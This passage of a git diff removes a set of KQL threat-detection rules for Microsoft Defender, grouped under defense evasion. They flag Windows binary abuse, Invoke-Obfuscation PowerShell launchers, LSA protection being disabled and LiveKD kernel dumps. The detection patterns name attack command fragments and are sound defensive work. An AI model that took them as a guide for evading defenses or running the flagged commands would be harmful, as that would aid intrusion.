-| where ((FolderPath endswith ":\\Windows\\System32\\bash.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\bash.exe") or ProcessVersionInfoOriginalFileName =~ "Bash.exe") and (not(((ProcessCommandLine contains "bash.exe -" or ProcessCommandLine contains "bash -") or ProcessCommandLine =~ "" or isnull(ProcessCommandLine) or (ProcessCommandLine in~ ("bash.exe", "bash")))))
\ No newline at end of file
diff --git a/Defense Evasion/Indirect_Inline_Command_Execution_Via_Bash.EXE.kql b/Defense Evasion/Indirect_Inline_Command_Execution_Via_Bash.EXE.kql
deleted file mode 100644
index 833625c5..00000000
--- a/Defense Evasion/Indirect_Inline_Command_Execution_Via_Bash.EXE.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/11/24
-// Level: medium
-// Description: Detects execution of Microsoft bash launcher with the "-c" flag.
-This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
-
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ProcessCommandLine contains " -c " and ((FolderPath endswith ":\\Windows\\System32\\bash.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\bash.exe") or ProcessVersionInfoOriginalFileName =~ "Bash.exe")
\ No newline at end of file
diff --git a/Defense Evasion/InfDefaultInstall.exe_.inf_Execution.kql b/Defense Evasion/InfDefaultInstall.exe_.inf_Execution.kql
deleted file mode 100644
index 3f8cac71..00000000
--- a/Defense Evasion/InfDefaultInstall.exe_.inf_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/13
-// Level: medium
-// Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "InfDefaultInstall.exe " and ProcessCommandLine contains ".inf"
\ No newline at end of file
diff --git a/Defense Evasion/Insensitive_Subfolder_Search_Via_Findstr.EXE.kql b/Defense Evasion/Insensitive_Subfolder_Search_Via_Findstr.EXE.kql
deleted file mode 100644
index 11e34eff..00000000
--- a/Defense Evasion/Insensitive_Subfolder_Search_Via_Findstr.EXE.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/05
-// Level: low
-// Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
-
-// Tags: attack.defense_evasion, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
-DeviceProcessEvents
-| where (ProcessCommandLine contains "findstr" or FolderPath endswith "findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") and ((ProcessCommandLine contains " -i " or ProcessCommandLine contains " /i ") and (ProcessCommandLine contains " -s " or ProcessCommandLine contains " /s "))
\ No newline at end of file
diff --git a/Defense Evasion/Install_New_Package_Via_Winget_Local_Manifest.kql b/Defense Evasion/Install_New_Package_Via_Winget_Local_Manifest.kql
deleted file mode 100644
index 5c46388e..00000000
--- a/Defense Evasion/Install_New_Package_Via_Winget_Local_Manifest.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sreeman, Florian Roth (Nextron Systems), frack113
-// Date: 2020/04/21
-// Level: medium
-// Description: Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.
-The manifest option enables you to install an application by passing in a YAML file directly to the client.
-Winget can be used to download and install exe, msi or msix files later.
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and (ProcessCommandLine contains "install" or ProcessCommandLine contains " add ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "--manifest")
\ No newline at end of file
diff --git a/Defense Evasion/Internet_Explorer_DisableFirstRunCustomize_Enabled.kql b/Defense Evasion/Internet_Explorer_DisableFirstRunCustomize_Enabled.kql
deleted file mode 100644
index f419e936..00000000
--- a/Defense Evasion/Internet_Explorer_DisableFirstRunCustomize_Enabled.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: medium
-// Description: Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.
-
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Microsoft\\Internet Explorer\\Main\\DisableFirstRunCustomize") and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\ie4uinit.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_CLIP+_Launcher.kql b/Defense Evasion/Invoke-Obfuscation_CLIP+_Launcher.kql
deleted file mode 100644
index 4af2d38a..00000000
--- a/Defense Evasion/Invoke-Obfuscation_CLIP+_Launcher.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020/10/13
-// Level: high
-// Description: Detects Obfuscated use of Clip.exe to execute PowerShell
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/r") and (ProcessCommandLine contains "cmd" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "clipboard]::" and ProcessCommandLine contains "-f")
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql b/Defense Evasion/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql
deleted file mode 100644
index b42471c1..00000000
--- a/Defense Evasion/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2020/10/18
-// Level: medium
-// Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "system.io.compression.deflatestream" or ProcessCommandLine contains "system.io.streamreader" or ProcessCommandLine contains "readtoend(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "text.encoding]::ascii")
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql b/Defense Evasion/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql
deleted file mode 100644
index c693d26a..00000000
--- a/Defense Evasion/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community
-// Date: 2019/11/08
-// Level: high
-// Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[" or ProcessCommandLine matches regex "\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[" or ProcessCommandLine matches regex "\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[" or ProcessCommandLine matches regex "\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}" or ProcessCommandLine matches regex "\\*mdr\\*\\W\\s*\\)\\.Name" or ProcessCommandLine matches regex "\\$VerbosePreference\\.ToString\\(" or ProcessCommandLine matches regex "\\[String\\]\\s*\\$VerbosePreference"
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_STDIN+_Launcher.kql b/Defense Evasion/Invoke-Obfuscation_STDIN+_Launcher.kql
deleted file mode 100644
index 4108ea3f..00000000
--- a/Defense Evasion/Invoke-Obfuscation_STDIN+_Launcher.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020/10/15
-// Level: high
-// Description: Detects Obfuscated use of stdin to execute PowerShell
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\\""
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql b/Defense Evasion/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql
deleted file mode 100644
index e1957d0c..00000000
--- a/Defense Evasion/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2020/10/13
-// Level: high
-// Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "{0}" or ProcessCommandLine contains "{1}" or ProcessCommandLine contains "{2}" or ProcessCommandLine contains "{3}" or ProcessCommandLine contains "{4}" or ProcessCommandLine contains "{5}") and (ProcessCommandLine contains "&&set" and ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "-f")
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_VAR+_Launcher.kql b/Defense Evasion/Invoke-Obfuscation_VAR+_Launcher.kql
deleted file mode 100644
index c5c03061..00000000
--- a/Defense Evasion/Invoke-Obfuscation_VAR+_Launcher.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020/10/15
-// Level: high
-// Description: Detects Obfuscated use of Environment Variables to execute PowerShell
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r)(?:\\s|)\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\""
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_Via_Stdin.kql b/Defense Evasion/Invoke-Obfuscation_Via_Stdin.kql
deleted file mode 100644
index c7d99e0d..00000000
--- a/Defense Evasion/Invoke-Obfuscation_Via_Stdin.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/12
-// Level: high
-// Description: Detects Obfuscated Powershell via Stdin in Scripts
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "(?i)(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*""
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_Via_Use_Clip.kql b/Defense Evasion/Invoke-Obfuscation_Via_Use_Clip.kql
deleted file mode 100644
index b66ecade..00000000
--- a/Defense Evasion/Invoke-Obfuscation_Via_Use_Clip.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/09
-// Level: high
-// Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "(?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)"
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_Via_Use_MSHTA.kql b/Defense Evasion/Invoke-Obfuscation_Via_Use_MSHTA.kql
deleted file mode 100644
index 7041f5ee..00000000
--- a/Defense Evasion/Invoke-Obfuscation_Via_Use_MSHTA.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/08
-// Level: high
-// Description: Detects Obfuscated Powershell via use MSHTA in Scripts
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "set" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "mshta" and ProcessCommandLine contains "vbscript:createobject" and ProcessCommandLine contains ".run" and ProcessCommandLine contains "(window.close)"
\ No newline at end of file
diff --git a/Defense Evasion/JScript_Compiler_Execution.kql b/Defense Evasion/JScript_Compiler_Execution.kql
deleted file mode 100644
index 5249425a..00000000
--- a/Defense Evasion/JScript_Compiler_Execution.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/05/02
-// Level: low
-// Description: Detects the execution of the "jsc.exe" (JScript Compiler).
-Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting.
-
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where FolderPath endswith "\\jsc.exe" or ProcessVersionInfoOriginalFileName =~ "jsc.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Kavremover_Dropped_Binary_LOLBIN_Usage.kql b/Defense Evasion/Kavremover_Dropped_Binary_LOLBIN_Usage.kql
deleted file mode 100644
index 1aa5330d..00000000
--- a/Defense Evasion/Kavremover_Dropped_Binary_LOLBIN_Usage.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/11/01
-// Level: high
-// Description: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where ProcessCommandLine contains " run run-cmd " and (not((InitiatingProcessFolderPath endswith "\\kavremover.exe" or InitiatingProcessFolderPath endswith "\\cleanapi.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Kernel_Memory_Dump_Via_LiveKD.kql b/Defense Evasion/Kernel_Memory_Dump_Via_LiveKD.kql
deleted file mode 100644
index 66c34716..00000000
--- a/Defense Evasion/Kernel_Memory_Dump_Via_LiveKD.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: high
-// Description: Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -m" or ProcessCommandLine contains " /m") and ((FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe") or ProcessVersionInfoOriginalFileName =~ "livekd.exe")
\ No newline at end of file
diff --git a/Defense Evasion/LOL-Binary_Copied_From_System_Directory.kql b/Defense Evasion/LOL-Binary_Copied_From_System_Directory.kql
deleted file mode 100644
index 9661cd24..00000000
--- a/Defense Evasion/LOL-Binary_Copied_From_System_Directory.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/29
-// Level: high
-// Description: Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.
-
-// Tags: attack.defense_evasion, attack.t1036.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and ((ProcessCommandLine contains "\\bitsadmin.exe" or ProcessCommandLine contains "\\calc.exe" or ProcessCommandLine contains "\\certutil.exe" or ProcessCommandLine contains "\\cmdl32.exe" or ProcessCommandLine contains "\\cscript.exe" or ProcessCommandLine contains "\\mshta.exe" or ProcessCommandLine contains "\\rundll32.exe" or ProcessCommandLine contains "\\wscript.exe") and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS"))
\ No newline at end of file
diff --git a/Defense Evasion/LSA_PPL_Protection_Disabled_Via_Reg.EXE.kql b/Defense Evasion/LSA_PPL_Protection_Disabled_Via_Reg.EXE.kql
deleted file mode 100644
index 3a052bf3..00000000
--- a/Defense Evasion/LSA_PPL_Protection_Disabled_Via_Reg.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/22
-// Level: high
-// Description: Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process
-// Tags: attack.defense_evasion, attack.t1562.010
-DeviceProcessEvents
-| where (ProcessCommandLine contains "SYSTEM\\CurrentControlSet\\Control\\Lsa" and (ProcessCommandLine contains " add " and ProcessCommandLine contains " /d 0" and ProcessCommandLine contains " /v RunAsPPL ")) and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Launch-VsDevShell.PS1_Proxy_Execution.kql b/Defense Evasion/Launch-VsDevShell.PS1_Proxy_Execution.kql
deleted file mode 100644
index 6b429c52..00000000
--- a/Defense Evasion/Launch-VsDevShell.PS1_Proxy_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.
-// Tags: attack.defense_evasion, attack.t1216.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "VsWherePath " or ProcessCommandLine contains "VsInstallationPath ") and ProcessCommandLine contains "Launch-VsDevShell.ps1"
\ No newline at end of file
diff --git a/Defense Evasion/Legitimate_Application_Dropped_Archive.kql b/Defense Evasion/Legitimate_Application_Dropped_Archive.kql
deleted file mode 100644
index 61f36222..00000000
--- a/Defense Evasion/Legitimate_Application_Dropped_Archive.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth
-// Date: 2022/08/21
-// Level: high
-// Description: Detects programs on a Windows system that should not write an archive to disk
-// Tags: attack.defense_evasion, attack.t1218
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\finger.exe" or InitiatingProcessFolderPath endswith "\\notepad.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\hh.exe") and (FolderPath endswith ".zip" or FolderPath endswith ".rar" or FolderPath endswith ".7z" or FolderPath endswith ".diagcab" or FolderPath endswith ".appx")
\ No newline at end of file
diff --git a/Defense Evasion/Legitimate_Application_Dropped_Executable.kql b/Defense Evasion/Legitimate_Application_Dropped_Executable.kql
deleted file mode 100644
index 7435b284..00000000
--- a/Defense Evasion/Legitimate_Application_Dropped_Executable.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth (Nextron Systems)
-// Date: 2022/08/21
-// Level: high
-// Description: Detects programs on a Windows system that should not write executables to disk
-// Tags: attack.defense_evasion, attack.t1218
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\hh.exe" or InitiatingProcessFolderPath endswith "\\finger.exe") and (FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".ocx")
\ No newline at end of file
diff --git a/Defense Evasion/Legitimate_Application_Dropped_Script.kql b/Defense Evasion/Legitimate_Application_Dropped_Script.kql
deleted file mode 100644
index 73e265bc..00000000
--- a/Defense Evasion/Legitimate_Application_Dropped_Script.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth (Nextron Systems)
-// Date: 2022/08/21
-// Level: high
-// Description: Detects programs on a Windows system that should not write scripts to disk
-// Tags: attack.defense_evasion, attack.t1218
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\hh.exe" or InitiatingProcessFolderPath endswith "\\finger.exe") and (FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".vbs" or FolderPath endswith ".scf" or FolderPath endswith ".wsf" or FolderPath endswith ".wsh")
\ No newline at end of file
diff --git a/Defense Evasion/LiveKD_Driver_Creation.kql b/Defense Evasion/LiveKD_Driver_Creation.kql
deleted file mode 100644
index 7e5f529f..00000000
--- a/Defense Evasion/LiveKD_Driver_Creation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: medium
-// Description: Detects the creation of the LiveKD driver, which is used for live kernel debugging
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe") and FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS"
\ No newline at end of file
diff --git a/Defense Evasion/LiveKD_Driver_Creation_By_Uncommon_Process.kql b/Defense Evasion/LiveKD_Driver_Creation_By_Uncommon_Process.kql
deleted file mode 100644
index 69e1685e..00000000
--- a/Defense Evasion/LiveKD_Driver_Creation_By_Uncommon_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: high
-// Description: Detects the creation of the LiveKD driver by a process image other than "livekd.exe".
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS" and (not((InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/LiveKD_Kernel_Memory_Dump_File_Created.kql b/Defense Evasion/LiveKD_Kernel_Memory_Dump_File_Created.kql
deleted file mode 100644
index 003653f9..00000000
--- a/Defense Evasion/LiveKD_Kernel_Memory_Dump_File_Created.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: high
-// Description: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where FolderPath =~ "C:\\Windows\\livekd.dmp"
\ No newline at end of file
diff --git a/Defense Evasion/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql b/Defense Evasion/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql
deleted file mode 100644
index 815998df..00000000
--- a/Defense Evasion/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Luc Génaux
-// Date: 2023/11/28
-// Level: high
-// Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.
-This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
-It could also be used for anti-analysis purposes by shut downing specific processes.
-
-// Tags: attack.impact, attack.defense_evasion, attack.t1486, attack.t1562.001
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql b/Defense Evasion/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql
deleted file mode 100644
index c3b92be9..00000000
--- a/Defense Evasion/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Luc Génaux
-// Date: 2023/11/28
-// Level: low
-// Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process.
-This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
-It could also be used for anti-analysis purposes by shut downing specific processes.
-
-// Tags: attack.impact, attack.defense_evasion, attack.t1486, attack.t1562.001
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and (not((InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains ":\\$WINDOWS.~BT\\" or InitiatingProcessFolderPath contains ":\\$WinREAgent\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\ProgramData\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\SoftwareDistribution\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysNative\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\" or InitiatingProcessFolderPath contains ":\\WUDownloadCache\\") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\is-" and InitiatingProcessFolderPath contains ".tmp\\") and InitiatingProcessFolderPath endswith ".tmp"))))
\ No newline at end of file
diff --git a/Defense Evasion/Lolbin_Runexehelper_Use_As_Proxy.kql b/Defense Evasion/Lolbin_Runexehelper_Use_As_Proxy.kql
deleted file mode 100644
index aa25bb7b..00000000
--- a/Defense Evasion/Lolbin_Runexehelper_Use_As_Proxy.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/29
-// Level: medium
-// Description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\runexehelper.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Lolbin_Ssh.exe_Use_As_Proxy.kql b/Defense Evasion/Lolbin_Ssh.exe_Use_As_Proxy.kql
deleted file mode 100644
index a4536f33..00000000
--- a/Defense Evasion/Lolbin_Ssh.exe_Use_As_Proxy.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/12/29
-// Level: medium
-// Description: Detect usage of the "ssh.exe" binary as a proxy to launch other programs
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\OpenSSH\\sshd.exe" or ((ProcessCommandLine contains "ProxyCommand=" or (ProcessCommandLine contains "PermitLocalCommand" and ProcessCommandLine contains "LocalCommand")) and FolderPath endswith "\\ssh.exe")
\ No newline at end of file
